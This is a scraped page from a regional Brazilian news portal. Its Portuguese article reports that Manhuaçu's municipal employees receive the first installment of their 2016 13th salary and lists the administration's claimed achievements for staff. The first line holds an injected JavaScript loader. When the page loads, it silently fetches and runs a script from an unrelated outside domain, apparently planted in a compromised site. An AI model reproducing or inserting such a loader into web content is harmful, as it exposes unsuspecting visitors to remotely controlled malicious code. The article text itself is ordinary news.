;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Servidores Municipais recebem primeira parcela do 13º de 2016 nesta sexta feira. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Servidores Municipais recebem primeira parcela do 13º de 2016 nesta sexta feira.

13salarioA Prefeitura de Manhuaçu concede nesta sexta-feira, 10, a primeira parcela do 13º salário de 2016 aos servidores municipais. Como já é de praxe da atual gestão, 50% do pagamento é adiantado no mês de junho, como uma forma de valorizar o servidor, e também de aquecer o comércio local, haja vista a comemoração do Dia dos Namorados, no próximo dia 12. O restante do pagamento é feito sempre em dezembro.

O país vive em plena recessão. Muitos municípios e estados chegaram aos extremos de atrasarem salários e/ou não concederem outros direitos. Alguns chegaram ao ponto das demissões. Manhuaçu segue na contramão desta realidade devido, em primeiro lugar, a um grande esforço econômico que vem sendo empreendido pela atual gestão, que conduz as finanças do município de forma responsável e séria. Em segundo, porque desde 2013, o servidor público de Manhuaçu é prioridade. Confira abaixo o porquê:

REMUNERAÇÃO: Desde 2013, em todos os anos o salário sofreu reajustes acima da inflação. Neste ano, em razão da situação financeira complicada, somente o salário mínimo sofreu reajuste. Apesar disso, o pagamento sempre foi depositado antes do vencimento do mês, nunca houve atrasos. O décimo terceiro salário, a cada ano tem sua primeira parcela paga sempre entre o fim do primeiro semestre e o princípio do segundo.

DIREITOS E BENEFÍCIOS: Servidores do SAAE e do SAMAL foram alvos de importantes ganhos em saúde e alimentação. Destaque ainda para a concessão de insalubridade aos servidores do SAMAL que fazem jus. O quinquênio, que antes só era concedido mediante a um cansativo e burocrático processo, desde o ano passado já é concedido automaticamente a quem tem direito.

INJUSTIÇAS CORRIGIDAS: Inúmeros servidores e ex-servidores, há anos, pleiteavam judicialmente por direitos negados em gestões anteriores. Desde 2013, a ordem foi convocar esses servidores e solucionar os processos, ou seja, pagar o que é de direito e estava sendo postergado por outras gestões. Dezenas de processos já foram solucionados.

CAPACITAÇÃO: Capacitar um servidor significa mais do que otimizar o serviço público, significa prezar pelo servidor e oferecer a ele oportunidade de se aperfeiçoar. Inúmeras capacitações nos mais diversos setores da Prefeitura são promovidas, desde 2013.

CONCURSO PÚBLICO: Além de promover o Concurso de 2014-15, para 473 vagas nos mais diversos setores, a atual administração ainda empossou servidores classificados em concursos realizados por gestões anteriores. Destaque para o SAAE, que já tem 100% do seu pessoal concursado. Ao todo, cerca de 500 concursados já foram empossados desde 2013.

Secretaria de Comunicação Social de Manhuaçu

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.